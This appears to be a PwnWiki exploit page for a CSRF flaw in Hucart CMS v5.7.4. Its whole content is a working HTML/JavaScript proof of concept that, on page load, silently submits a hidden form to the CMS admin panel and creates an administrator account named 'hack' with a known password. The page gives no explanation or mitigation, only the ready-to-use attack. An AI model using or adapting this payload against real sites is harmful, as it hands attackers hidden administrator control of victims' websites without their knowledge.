Hucart cms v5.7.4 任意管理員帳號新增CSRF漏洞

From PwnWiki
Revision as of 13:30, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> <html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target =...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

EXP

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
Retrieved from "https://pwnwiki.com/index.php?title=Hucart_cms_v5.7.4_任意管理員帳號新增CSRF漏洞&oldid=1459"